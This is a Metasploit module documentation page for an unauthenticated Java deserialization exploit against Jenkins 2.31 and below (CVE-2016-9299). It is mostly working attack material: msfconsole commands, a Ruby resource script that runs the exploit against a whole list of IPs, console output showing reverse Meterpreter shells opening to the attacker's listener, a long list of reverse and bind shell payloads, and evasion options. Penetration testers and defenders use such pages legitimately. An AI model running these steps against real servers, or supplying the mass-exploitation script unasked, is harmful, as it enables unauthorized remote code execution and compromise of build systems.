Jenkins CLI HTTP Java Deserialization Vulnerability - Metasploit


This page contains detailed information about how to use the exploit/linux/misc/jenkins_ldap_deserialize metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Jenkins CLI HTTP Java Deserialization Vulnerability
Module: exploit/linux/misc/jenkins_ldap_deserialize
Source code: modules/exploits/linux/misc/jenkins_ldap_deserialize.rb
Disclosure date: 2016-11-16
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): 8080
List of CVEs: CVE-2016-9299

This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not required to exploit this vulnerability.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using jenkins_ldap_deserialize against a single host

Normally, you can use exploit/linux/misc/jenkins_ldap_deserialize this way:

msf > use exploit/linux/misc/jenkins_ldap_deserialize
msf exploit(jenkins_ldap_deserialize) > show targets
    ... a list of targets ...
msf exploit(jenkins_ldap_deserialize) > set TARGET target-id
msf exploit(jenkins_ldap_deserialize) > show options
    ... show and set options ...
msf exploit(jenkins_ldap_deserialize) > exploit

Using jenkins_ldap_deserialize against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your jenkins_ldap_deserialize will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/misc/jenkins_ldap_deserialize")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Jenkins 2.31 or below is vulnerable and can be downloaded from updates.jenkins-ci.org

This vulnerability does not require authentication and only HTTP access to the vulnerable application is required.

Verification Steps


  1. Download jenkins 2.31
  2. Install jenkins java -jar jenkins.war
  3. Start msfconsole
  4. Do: use exploit/linux/misc/jenkins_ldap_deserialize
  5. Do: set RHOST [target host]
  6. Do: set PAYLOAD cmd/unix/generic
  7. Do: set CMD 'touch /tmp/wtf'
  8. Do: run
  9. It should create /tmp/wtf on the target host.

Required Options


RHOST

The address of the jenkins server.

Options


RPORT

The http port for the jenkins server. (Defaults to 8080)

TARGETURI

The path to the target instance of Jenkins. (Defaults to /)

SRVHOST

The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)

SRVPORT

The local port to listen for the LDAP request on. (Defaults to 1389)

LDAPHOST

The ldap host the exploit will connect to. Can be different from SRVHOST if in a environment where there is port forwarding. (Defaults to 127.0.0.1)

Scenarios


Example usage against a unix target running Jenkins 2.31.

  msf > use exploit/linux/misc/jenkins_ldap_deserialize
  msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
  TARGETURI => /
  msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
  RHOST => 127.0.0.1
  msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
  RPORT => 8080
  msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
  PAYLOAD => cmd/unix/generic
  msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
  CMD => touch /tmp/wtf
  msf exploit(jenkins_ldap_deserialize) > run
  [*] Exploit completed, but no session was created.

Go back to menu.

Msfconsole Usage


Here is how the linux/misc/jenkins_ldap_deserialize exploit module looks in the msfconsole:

msf6 > use exploit/linux/misc/jenkins_ldap_deserialize

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(linux/misc/jenkins_ldap_deserialize) > show info

       Name: Jenkins CLI HTTP Java Deserialization Vulnerability
     Module: exploit/linux/misc/jenkins_ldap_deserialize
   Platform: Linux, Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-11-16

Provided by:
  Matthias Kaiser
  Alisa Esage
  Ivan
  YSOSerial

Available targets:
  Id  Name
  --  ----
  0   Jenkins 2.31

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  LDAPHOST   127.0.0.1        yes       The ldap host the exploit will try to connect to
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8080             yes       The target port (TCP)
  SRVHOST    127.0.0.1        yes       The local host to listen on for the ldap server. This must be an address on the local machine or 0.0.0.0
  SRVPORT    1389             yes       The local port to listen on for the ldap server.
  TARGETURI  /                yes       The base path to Jenkins

Payload information:

Description:
  This module exploits a vulnerability in Jenkins. An unsafe 
  deserialization bug exists on the Jenkins, which allows remote 
  arbitrary code execution via HTTP. Authentication is not required to 
  exploit this vulnerability.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-9299
  https://github.com/jenkinsci-cert/SECURITY-218
  https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16
  http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition
  https://github.com/frohoff/ysoserial

Module Options


This is a complete list of options available in the linux/misc/jenkins_ldap_deserialize exploit:

msf6 exploit(linux/misc/jenkins_ldap_deserialize) > show options

Module options (exploit/linux/misc/jenkins_ldap_deserialize):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LDAPHOST   127.0.0.1        yes       The ldap host the exploit will try to connect to
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    127.0.0.1        yes       The local host to listen on for the ldap server. This must be an address on the local machine or 0.0.0.0
   SRVPORT    1389             yes       The local port to listen on for the ldap server.
   TARGETURI  /                yes       The base path to Jenkins

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Jenkins 2.31

Advanced Options


Here is a complete list of advanced options supported by the linux/misc/jenkins_ldap_deserialize exploit:

msf6 exploit(linux/misc/jenkins_ldap_deserialize) > show advanced

Module advanced options (exploit/linux/misc/jenkins_ldap_deserialize):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/misc/jenkins_ldap_deserialize module can exploit:

msf6 exploit(linux/misc/jenkins_ldap_deserialize) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Jenkins 2.31

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/misc/jenkins_ldap_deserialize exploit:

msf6 exploit(linux/misc/jenkins_ldap_deserialize) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   15  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   16  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   17  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   18  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   19  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   20  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   21  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   22  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   23  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   24  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   25  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   26  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   27  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   28  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   29  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   30  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   31  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   32  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   33  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   34  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   35  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   36  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   37  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   38  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   39  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   40  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   41  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)

Evasion Options


Here is the full list of possible evasion options supported by the linux/misc/jenkins_ldap_deserialize exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/misc/jenkins_ldap_deserialize) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Invalid URI: <VALUE>


Here is a relevant code snippet related to the "Invalid URI: <VALUE>" error message:

67:	
68:	  def target_uri
69:	    begin
70:	      URI(datastore['TARGETURI'])
71:	    rescue ::URI::InvalidURIError
72:	      print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
73:	      raise Msf::OptionValidateError.new(['TARGETURI'])
74:	    end
75:	  end
76:	
77:	  def normalize_uri(*strs)

TARGETURI


Here is a relevant code snippet related to the "TARGETURI" error message:

68:	  def target_uri
69:	    begin
70:	      URI(datastore['TARGETURI'])
71:	    rescue ::URI::InvalidURIError
72:	      print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
73:	      raise Msf::OptionValidateError.new(['TARGETURI'])
74:	    end
75:	  end
76:	
77:	  def normalize_uri(*strs)
78:	    new_str = strs * "/"

The connection timed out.


Here is a relevant code snippet related to the "The connection timed out." error message:

320:	  def vulnerable?
321:	    res = send_request_cgi({
322:	      'uri' => normalize_uri(target_uri.path)
323:	    })
324:	    unless res
325:	      fail_with(Failure::Unknown, 'The connection timed out.')
326:	    end
327:	
328:	    http_headers = res.headers
329:	
330:	    http_headers['X-Jenkins'] && http_headers['X-Jenkins'] <= "2.31"

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Matthias Kaiser
  • Alisa Esage
  • Ivan
  • YSOSerial

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.